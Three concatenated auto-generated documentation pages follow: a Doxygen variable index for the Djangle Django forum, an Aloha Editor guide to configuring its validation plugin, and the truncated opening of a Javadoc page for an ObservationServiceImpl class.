donkeyxote/djangle
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.10"/> <title>Djangle: Package Functions</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="navtree.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="resize.js"></script> <script type="text/javascript" src="navtreedata.js"></script> <script type="text/javascript" src="navtree.js"></script> <script type="text/javascript"> $(document).ready(initResizable); $(window).load(resizeHeight); </script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectlogo"><img alt="Logo" src="doc_logo.png"/></td> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">Djangle </div> <div id="projectbrief">A django jungle forum</div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.10 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li class="current"><a href="namespaces.html"><span>Packages</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="namespaces.html"><span>Packages</span></a></li> <li class="current"><a href="namespacemembers.html"><span>Package&#160;Functions</span></a></li> </ul> </div> <div id="navrow3" class="tabs2"> <ul class="tablist"> <li><a href="namespacemembers.html"><span>All</span></a></li> <li><a href="namespacemembers_func.html"><span>Functions</span></a></li> <li class="current"><a href="namespacemembers_vars.html"><span>Variables</span></a></li> </ul> </div> <div id="navrow4" class="tabs3"> <ul class="tablist"> <li><a href="#index_a"><span>a</span></a></li> <li><a href="#index_b"><span>b</span></a></li> <li><a href="#index_c"><span>c</span></a></li> <li><a href="#index_d"><span>d</span></a></li> <li><a href="#index_e"><span>e</span></a></li> <li><a href="#index_i"><span>i</span></a></li> <li><a href="#index_l"><span>l</span></a></li> <li><a href="#index_m"><span>m</span></a></li> <li><a href="#index_r"><span>r</span></a></li> <li><a href="#index_s"><span>s</span></a></li> <li><a href="#index_t"><span>t</span></a></li> <li><a href="#index_u"><span>u</span></a></li> <li class="current"><a href="#index_w"><span>w</span></a></li> </ul> </div> </div><!-- top --> <div id="side-nav" class="ui-resizable side-nav-resizable"> <div id="nav-tree"> <div id="nav-tree-contents"> <div id="nav-sync" class="sync"></div> </div> </div> <div id="splitbar" style="-moz-user-select:none;" class="ui-resizable-handle"> </div> </div> <script type="text/javascript"> $(document).ready(function(){initNavTree('namespacemembers_vars.html','');}); </script> <div id="doc-content"> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div class="contents"> &#160; <h3><a class="anchor" id="index_a"></a>- a -</h3><ul> <li>ALLOWED_HOSTS : <a class="el" href="namespacedjangle_1_1settings.html#a59ec5aad7e968701490040920217d0a3">djangle.settings</a> </li> <li>alphanumeric : <a class="el" href="namespaceforum_1_1models.html#aea0ab8f7b166a5a4b2eebd6d28dc7cd4">forum.models</a> </li> <li>app : <a class="el" href="namespacedjangle_1_1celery.html#a4fdf600c0c29fe3185345f3872d1b57e">djangle.celery</a> </li> <li>application : <a class="el" href="namespacedjangle_1_1wsgi.html#a1cef98675bf1cf1cfe9fa1cceed8a40c">djangle.wsgi</a> </li> <li>AUTH_USER_MODEL : <a class="el" href="namespacedjangle_1_1settings.html#a8b3a0dfd4cc61e57166d4321c4b1faa7">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_b"></a>- b -</h3><ul> <li>BASE_DIR : <a class="el" href="namespacedjangle_1_1settings.html#a656a69be3a4edd1ce2afdc1b7f71498f">djangle.settings</a> </li> <li>BROKER_URL : <a class="el" href="namespacedjangle_1_1settings.html#a03faef0b9a3610a2e7517444f76fbf3a">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_c"></a>- c -</h3><ul> <li>CELERYBEAT_SCHEDULE : <a class="el" href="namespacedjangle_1_1settings.html#aaa3b87cc8f74c510a01bc719b45823f9">djangle.settings</a> </li> <li>config : <a class="el" href="namespacedjangle_1_1settings.html#a65f6aebaf470a13f4cab6e572d8c1217">djangle.settings</a> </li> <li>CRISPY_TEMPLATE_PACK : <a class="el" href="namespacedjangle_1_1settings.html#a7362c9a300acdc3c8e9045ff2f6f3b1c">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_d"></a>- d -</h3><ul> <li>DATABASES : <a class="el" href="namespacedjangle_1_1settings.html#a3e5c5904fdf0dbeceb7bffaa7d680a8a">djangle.settings</a> </li> <li>DATE_FORMAT : <a class="el" href="namespaceforum_1_1tasks.html#acf4f407f59380e366f71467ad22d1a71">forum.tasks</a> </li> <li>DEBUG : <a class="el" href="namespacedjangle_1_1settings.html#a86eba572bb20336a5fda3146dbfad1ac">djangle.settings</a> </li> <li>DEFAULT_FROM_EMAIL : <a class="el" href="namespacedjangle_1_1settings.html#ac70e73981c978c406ee7b5755522a99c">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_e"></a>- e -</h3><ul> <li>ELEM_PER_PAGE : <a class="el" href="namespacedjangle_1_1settings.html#ad7dec7aac1d4475b4361b0d031e513bb">djangle.settings</a> </li> <li>EMAIL_HOST : <a class="el" href="namespacedjangle_1_1settings.html#a9953a903d644b7873ed3b464fe984e71">djangle.settings</a> </li> <li>EMAIL_HOST_PASSWORD : <a class="el" href="namespacedjangle_1_1settings.html#a59d4ffe1bda79461879bcb1ddc7d251b">djangle.settings</a> </li> <li>EMAIL_HOST_USER : <a class="el" href="namespacedjangle_1_1settings.html#a98cac8d81c32648ef76108b730a72bf1">djangle.settings</a> </li> <li>EMAIL_PORT : <a class="el" href="namespacedjangle_1_1settings.html#ae37a004e5ef6883c36a81093259d00b3">djangle.settings</a> </li> <li>EMAIL_SUBJECT_PREFIX : <a class="el" href="namespacedjangle_1_1settings.html#ac17e2a43b5841376dc3fb3a2a16f8f35">djangle.settings</a> </li> <li>EMAIL_USE_SSL : <a class="el" href="namespacedjangle_1_1settings.html#af4de51030f0dc177532c8183b8a500f0">djangle.settings</a> </li> <li>EMAIL_USE_TLS : <a class="el" href="namespacedjangle_1_1settings.html#a2e5af54c80ab84baff603786cfead42d">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_i"></a>- i -</h3><ul> <li>INSTALLED_APPS : <a class="el" href="namespacedjangle_1_1settings.html#a566772b59bcc49dae68cd286255a5afe">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_l"></a>- l -</h3><ul> <li>LANGUAGE_CODE : <a class="el" href="namespacedjangle_1_1settings.html#ab7a482aeac349c9ebe0cc8005ee8615b">djangle.settings</a> </li> <li>LOGIN_URL : <a class="el" href="namespacedjangle_1_1settings.html#a3ca16356d3e7ca6dc087b7ecefe74076">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_m"></a>- m -</h3><ul> <li>MEDIA_ROOT : <a class="el" href="namespacedjangle_1_1settings.html#a8920f7f12320aadbc95b1333d35fac10">djangle.settings</a> </li> <li>MEDIA_URL : <a class="el" href="namespacedjangle_1_1settings.html#a3104f69bc9aba8e8d701639bc683ce46">djangle.settings</a> </li> <li>MIDDLEWARE_CLASSES : <a class="el" href="namespacedjangle_1_1settings.html#a53afc7ec2dd567707f357327b4ccccd9">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_r"></a>- r -</h3><ul> <li>register : <a class="el" href="namespaceforum_1_1templatetags_1_1forum__extra.html#a9a693a5d6f8a186ff9f659377daa96ec">forum.templatetags.forum_extra</a> </li> <li>ROOT_URLCONF : <a class="el" href="namespacedjangle_1_1settings.html#a21749b062b66b1e43486aa0b86db3a68">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_s"></a>- s -</h3><ul> <li>SECRET_KEY : <a class="el" href="namespacedjangle_1_1settings.html#a4604ccb248ae2bb305eca7a0a1cd6435">djangle.settings</a> </li> <li>sep : <a class="el" href="namespaceforum_1_1tasks.html#a40e2ef22ac842a6c009abfbe01944280">forum.tasks</a> </li> <li>STATIC_URL : <a class="el" href="namespacedjangle_1_1settings.html#a30079b018744d3f580a1b43731726c83">djangle.settings</a> </li> <li>STATICFILES_DIRS : <a class="el" href="namespacedjangle_1_1settings.html#a1dac356e7d5d61152c33a1fd2050c3f4">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_t"></a>- t -</h3><ul> <li>TEMPLATES : <a class="el" href="namespacedjangle_1_1settings.html#a9476e2db84528916441a9986797eb8dc">djangle.settings</a> </li> <li>TIME_FORMAT : <a class="el" href="namespaceforum_1_1tasks.html#a19eaa2b57ea438dcd580fa26f296b14a">forum.tasks</a> </li> <li>TIME_ZONE : <a class="el" href="namespacedjangle_1_1settings.html#a7a1e6b12e5b36016453eefb7eb1cda2d">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_u"></a>- u -</h3><ul> <li>urlpatterns : <a class="el" href="namespacedjangle_1_1urls.html#af30f2c9f90cae2b1ec57cb2c962f55e4">djangle.urls</a> , <a class="el" href="namespaceforum_1_1urls.html#a7e2cef478265bfef090b94cc0b367e1b">forum.urls</a> </li> <li>USE_I18N : <a class="el" href="namespacedjangle_1_1settings.html#a17e9e1308171739ecc9baeb905483b4a">djangle.settings</a> </li> <li>USE_L10N : <a class="el" href="namespacedjangle_1_1settings.html#a3eca7bbcb84ce779bf713c1c97a92657">djangle.settings</a> </li> <li>USE_TZ : <a class="el" href="namespacedjangle_1_1settings.html#a6847001c91772eb4095b5c7f1929cd6e">djangle.settings</a> </li> </ul> <h3><a class="anchor" id="index_w"></a>- w -</h3><ul> <li>WSGI_APPLICATION : <a class="el" href="namespacedjangle_1_1settings.html#a8f75563f91a1d8754f03f318593c7a89">djangle.settings</a> </li> </ul> </div><!-- contents --> </div><!-- doc-content --> <!-- start footer part --> <div id="nav-path" class="navpath"><!-- id is needed for treeview function! --> <ul> <li class="footer">Generated by <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.10 </li> </ul> </div> </body> </html>
_old/www/js/alohaeditor-0.23.3/doc/guides/plugin_validation.html
lhl/pensieve
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>: The Validation Plugin</title> <!-- guides styles --> <link rel="stylesheet" type="text/css" href="stylesheets/style.css" /> <link rel="stylesheet" type="text/css" href="stylesheets/print.css" media="print" /> <link rel="stylesheet" type="text/css" href="stylesheets/strobe.css" /> <link rel="stylesheet" type="text/css" href="stylesheets/overrides.style.css" /> <link rel="stylesheet" type="text/css" href="stylesheets/overrides.print.css" media="print" /> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- syntax highlighting styles --> <link rel="stylesheet" type="text/css" href="stylesheets/syntaxhighlighter/shCore.css" /> <link rel="stylesheet" type="text/css" href="stylesheets/shThemeStrobeGuides.css" /> </head> <body class="guide"> <header role="banner"> <div class="container"> <h1 id="logo"> <a href="http://aloha-editor.org"><img src="images/header/logo.png" height="50" alt="Aloha Editor" /></a> </h1> <nav role="navigation"> <ul> <li><a href="http://aloha-editor.org/features.php" title="A shortcut for Aloha Editor features" class="new">Features</a></li> <li><a href="http://aloha-editor.org/plugins.php" title="A list of all known Aloha Editor plugins.">Plugins</a></li> <li class="active"><a href="http://aloha-editor.org/guides/" title="The Aloha Editor documentation">Guides</a></li> <li><a href="http://aloha-editor.org/about.php" title="Why Aloha? Why HTML5? Lern more about Aloha Editor">About</a></li> <li><a href="http://getsatisfaction.com/aloha_editor" title="Get help or help others">Forum</a></li> <li><a href="http://aloha-editor.org/demos.php" title="Feel the Aloha">Try it</a></li> </ul> </nav> </div> </header> <div id="feature"> <div class="wrapper"> <div class="feature_header"> <a href="/"><img src="images/strobe/guides.png"></a> <h2><a href="/"></a></h2> <p>These guides help you to make your content editable and to develop Aloha Editor.</p> </div> <div class="feature_sidebar"> <a href="index.html" id="guidesMenu"> Guides Index <span id="guidesArrow">&#9656;</span> </a> <div id="guides" class="clearfix" style="display: none;"> <a href="index.html" class="guidesMenu"> Guides Index <span class="guidesArrow">&#9662;</span> </a> <hr style="clear:both;"> <dl class="L"> <dt>Start Here</dt> <dd><a href="using_aloha.html">Use</a></dd> <dd><a href="develop_aloha.html">Develop</a></dd> <dd><a href="dependencies.html">Dependencies</a></dd> <dt>The Core</dt> <dd><a href="events.html">Events</a></dd> <dd><a href="using_commands.html">Commands</a></dd> <dd><a href="repository.html">Repositories</a></dd> <dd><a href="functional_description.html">Functional Description</a></dd> <dd><a href="internals.html">Internals</a></dd> </dl> <dl class="R"> <dt>UI</dt> <dd><a href="ui.html">Aloha Editor UI</a></dd> <dd><a href="core_hotkey.html">Hotkeys</a></dd> <dt>Plugins</dt> <dd><a href="plugins.html">Available Plugins</a></dd> <dd><a href="writing_plugins.html">Writing Plugins</a></dd> <dt>Contributing to Aloha Editor</dt> <dd><a href="releasing.html">Releasing</a></dd> <dd><a href="style_guide.html">Javascript Style Guide</a></dd> <dd><a href="documentation_guidelines.html">Documentation Guidelines</a></dd> <dd><a href="translations.html">Translations</a></dd> </dl> </div> </div> </div> </div> <div id="container"> <div class="wrapper"> <div id="mainCol"> <div class="headerSection"> <h2>The Validation Plugin</h2> <p>The validation plugin allows editables to be validated against predefined tests for correctness, and then have specific processes be undertaken in response to the result of these tests.</p> </div> <h3 id="dependencies">1 Dependencies</h3> <p>In order to use editable validation in Aloha Editor, the first thing you will need to do is to include the <code>extra/validation</code> and <code>common/contenthandler</code> plugins in your <code>data-aloha-plugins</code> list in the script tag which loads <code>aloha.js</code>.</p> <div class="code_container"> <pre class="brush: xml; gutter: false; toolbar: false"> &lt;script src=&quot;aloha.js&quot; data-aloha-plugins&quot;common/contenthandler, extra/validation&quot;&gt;&lt;/script&gt; </pre></div> <div class="note"><p><code>common/contenthandler</code> must be included for <code>extra/validation</code> to work because the validation plugin uses <a href="plugin_contenthandler.html">Content Handlers</a> internally and therefore depends on them.</p></div> <h3 id="configuration">2 Configuration</h3> <p>Loading the necessary plugins will make the validation features available in Aloha Editor, but that alone will not result in any editables being validated. For that to happen, you must configure which editables you wish to be validated, and what tests to run on each editable to validated it.</p> <p>At least two properties must be configured in the <tt>Aloha.settings.plugins.validation</tt> object to see automatic validation at work: <tt>config</tt>, which indicates <strong>what</strong> should be validated and <strong>how</strong> validity is tested, and at least one of either <tt>hooks</tt>, <tt>channels</tt>, or <tt>events</tt>, which will indicate <strong>when</strong> validation should be run.</p> <h4 id="config">2.1 config</h4> <p><tt>config</tt> is an object that maps strings of jQuery selectors against functions or regular expressions which will test the validity of any editable that is matched by the selector.</p> <div class="note"><p>An editable is &#8220;matched&#8221; by a selector when an editable and a selector string has an <a href="http://api.jquery.com/is/">$.fn.is&#40;&#41;</a> relationship.</p></div> <p><strong>Example:</strong></p> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> Aloha.settings.plugins.validation = { config: { // Tests all editables. // Editable is invalid if it contains any &lt;script&gt;, or &lt;style&gt; // elements. &quot;*&quot;: function (content, editable, $) { return 0 === $('&lt;div&gt;' + content + '&lt;/div&gt;').find('script,style'); }, // Tests editables with the id &quot;weekday&quot;. // Editable is invalid unless the entirety of its contents is a // name of one of the weekdays. &quot;#weekday&quot;: /^(monday|tuesday|wednesday|thursday|friday)$/i } } </pre></div><p>It is important to know that an editable with the id &#8220;weekday&#8221; matches both configured selectors and therefore will be subject to both validation tests. Notice that both functions, and regular expression are allowed as validation tests, but anything else is invalid configuration.</p> <div class="warning"><p>Anything other than a function or a regular expression will result in an error message, and that test being ignored. So a configuration setting like <code>Aloha.settings.plugins.validation.config['#my-editable'] = '&lt;b&gt;Lorem ipsum&lt;/b&gt;';</code> will cause the following message to be logged in the console: <strong><code>validation/validation-plugin: Encountered property "&lt;b&gt;Lorem ipsum&lt;/b&gt;" of type string when a RegExp or Function is required.</code></strong></p></div> <p>Consider the example validation function:</p> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> function (content, editable, $) { return 0 === $('&lt;div&gt;' + content + '&lt;/div&gt;').find('script,style'); }, </pre></div><p>There are a couple of things about the above example to take note of as important guidelines concerning how to write your own validation functions:</p> <ul> <li>It receives 3 parameters: The first arguments is a string containing the contents of the editable that is to be validated, the second, an Aloha.Editable object, and the third is a reference to the jQuery instance that is used by Aloha Editor internally.</li> <li>It is a predicate (a function that returns truthy or falsey values).</li> <li>It is a &#8220;pure&#8221; function&#8212;meaning that it does not alter external state outside of itself.</li> <li>It is not asynchronous.</li> <li>It is relatively cheap, and is not space/time-complex.</li> </ul> <p>The correct signature of a validation function (in <a href="https://developers.google.com/closure/compiler/docs/js-for-compiler">Google Closure Compiler Annotation</a> form) will look like this: <strong><code>function(string, Aloha.Editable, jQuery):boolean</code></strong></p> <div class="warning"><p>It is strongly encouraged for test functions to <strong>not</strong> alter the parameters that are passed to it, or any external state. However it may be necessary to change something outside the function to implement more advanced validation. <strong>Please see the section on &#8220;Advanced Configuration&#8221; to learn how to accomplish such things as validation failure messages.</strong></p></div> <p><strong>Cavet about the content string:</strong> The content string that is passed as the first argument into the test functions contains the contents of the editable which is to be validated. This string will be the result of calling getContents() on the respective editable. It means that all content handlers that have been configured to process the content when getContents() is called, would have handled the content before it reaches the validation test functions. Also, if your validation tests are being triggered from the <code>smartContentChange</code> hook, then the content string will also be subject to any content handlers that have been registered for <code>smartContentChange</code>, and in the order they are configured.</p> <p>Therefore:</p> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> Aloha.settings.contentHandler = { smartContentChange: ['word', 'validation', 'sanitize'] } </pre></div><p>In the above example, the content string that is passed to your validation tests will have been processed by the &#8220;word&#8221; content handler but not the &#8220;sanitize&#8221; content handler.</p> <h4 id="hooks-events-and-channels">2.2 hooks, events, and channels</h4> <p>It is possible to have validation be triggered automatically at predefined interaction points using one or more of the properties <tt>hooks</tt>, <tt>events</tt>, or <tt>channels</tt>. Each one is a list of strings of PubSub channels, or content handler triggers hooks, or event names.</p> <p><strong>Example:</strong></p> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> Aloha.settings.plugins.validation = { // Validate the involved editable when one of these content handling // triggers is fired. hooks: ['initEditable', 'smartContentChange'], // Validate the active editable when this event is fired. events: ['aloha-editable-deactivated'], // Validate the active editable when a message is published to this // channel. channels: ['aloha.selection.context-change'] } </pre></div> <div class="note"><p>There are four available content handler hooks: <strong>insertHtml</strong>, <strong>initEditable</strong>, <strong>getContents</strong>, <strong>smartContentChange</strong></p></div> <h4 id="onvalidation">2.3 onValidation()</h4> <p>If you provide a <code>onValidation()</code> function in your settings, each time that an editable is validated, your function will be called. It will receive the editable that was last validated as the first argument, and a boolean, indicating whether or not the editable failed validation, as the second argument.</p> <p><strong>Example:</strong></p> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> Aloha.settings.plugins.validation = { onValidation: function (editable, isValid) { if (isValid) { editable.obj.removeClass('validation-failed'); } else { editable.obj.addClass('validation-failed'); } } } </pre></div> <div class="note"><p>Be aware that validation on each editable is &#8220;fail-fast&#8221;&#8212;that is, as soon a the first validation tests fails, the editable is considered invalid, and no further tests are run.</p></div> <h3 id="validate-manual-validation">3 validate(): Manual validation</h3> <p>There may be times where it is necessary to manually trigger validation, when automatic hooks are not suitable. In these cases, the <code>Validation.validate()</code> function is useful.</p> <p>The <code>validate()</code> function call be called with a single editable, or a list of editables. All editables that are given to the function will be validated. If nothing is passed into the function, then all available editables will be validated. This is useful for doing such things are pre-save validation in your application.</p> <p>The return value of <code>validate()</code> is the set of all editables that failed validation.</p> <p><strong>Example:</strong></p> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> if (Aloha.features.validation) { Aloha.require(['validation/validation-plugin'], function (Validation) { var failures = Validation.validate(); if (failures.length) { console.error(failures.length + ' editables failed validation.'); } else { console.log('All editables are valid.'); } }); } </pre></div> <div class="note"><p>Notice that you can determine whether or not the <code>extra/validation</code> plugin is loaded based on whether the <ins>Aloha.features.validation</ins> flag is set to <code>true</code>.</p></div> <h3 id="advanced-configuration-example">4 Advanced Configuration Example</h3> <div class="code_container"> <pre class="brush: xml; gutter: false; toolbar: false"> &lt;div class=&quot;validation-wrapper&quot;&gt; &lt;div id=&quot;#my-editable&quot;&gt; [Write some content in here, but no lists allowed!] &lt;/div&gt; &lt;ul class=&quot;validation-errors&quot;&gt; &lt;li class=&quot;validation-error-lists&quot;&gt;Lists are not allowed&lt;/li&gt; &lt;li class=&quot;validation-error-images&quot;&gt;Images are not allowed&lt;/li&gt; &lt;li class=&quot;validation-error-profanity&quot;&gt;Profanity is not allowed&lt;/li&gt; &lt;/ul&gt; &lt;/div&gt; </pre></div> <div class="code_container"> <pre class="brush: javascript; gutter: false; toolbar: false"> Aloha.settings.plugins.validation = { config: { '#my-editable': function (content, editable, $) { var valid = 0 === $('&lt;div&gt;' + content + '&lt;/div&gt;').find('ul,ol').length; if (!valid) { editable.obj.closest('.validation-wrapper') .addClass('validation-error-lists'); } return valid; } }, onValidation: function (editable, isValid) { if (isValid) { editable.obj.closest('.validation-wrapper') .removeClass('validation-failed') .removeClass('validation-error-lists'); } else { editable.obj.closest('.validation-wrapper') .addClass('validation-failed'); } } } </pre></div> <div class="code_container"> <pre class="brush: css; gutter: false; toolbar: false"> .validation-errors { display: none; } .validation-error li { display: none; } .validation-failed .validation-errors { display: block; } .validation-error-lists .validation-error-lists { display: block; } </pre></div><h3 id="references">5 References</h3> <ul> <li><a href="https://developers.google.com/closure/compiler/docs/js-for-compiler">Google Closure Compiler Annotation</a></li> <li><a href="plugin_contenthandler.html">Content Handlers</a></li> <li><a href="events.html">Events</a></li> <li><a href="dependencies.html">Dependencies</a></li> </ul> </div> <div id="subCol"> <h3 class="chapter"><img src="images/strobe/chapters.png" alt="" />Chapters</h3> <ol class="chapters"> <li><a href="#dependencies"><p>Dependencies</p> </a></li><li><a href="#configuration"><p>Configuration</p> </a><ul><li><a href="#config"><p>config</p> </a></li> <li><a href="#hooks-events-and-channels"><p>hooks, events, and channels</p> </a></li> <li><a href="#onvalidation"><p>onValidation()</p> </a></li></ul></li><li><a href="#validate-manual-validation"><p>validate(): Manual validation</p> </a></li><li><a href="#advanced-configuration-example"><p>Advanced Configuration Example</p> </a></li><li><a href="#references"><p>References</p> </a></li> </ol> </div> </div> </div> <hr class="hide" /> <footer> <div class="container"> <div class="col"> <a href="index.html"><img src="images/footer/logo.png" alt="Aloha Editor" /></a> <p> Templates based on <a href="https://github.com/sproutcore/sproutguides">SproutCore guides</a>. </p> </div> <a href="#feature" class="top">Back To Top</a> </div> </footer> <script src="http://code.jquery.com/jquery-1.6.min.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript" src="javascripts/alohaEditorGuides.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shCore.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shBrushRuby.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shBrushJScript.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shBrushCss.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shBrushXml.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shBrushSql.js"></script> <script type="text/javascript" src="javascripts/syntaxhighlighter/shBrushPlain.js"></script> <script type="text/javascript"> SyntaxHighlighter.all() </script> </body> </html>
doc/JavaDoc/org/sloth/service/impl/ObservationServiceImpl.html
autermann/geosoftware
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> ObservationServiceImpl (Geosoftware II 2.0.0-SNAPSHOT API) </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="ObservationServiceImpl (Geosoftware II 2.0.0-SNAPSHOT API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/ObservationServiceImpl.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../org/sloth/service/impl/MD5PasswordService.html" title="class in org.sloth.service.impl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../../org/sloth/service/impl/UserServiceImpl.html" title="class in org.sloth.service.impl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?org/sloth/service/impl/ObservationServiceImpl.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ObservationServiceImpl.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> org.sloth.service.impl</FONT> <BR> Class ObservationServiceImpl</H2> 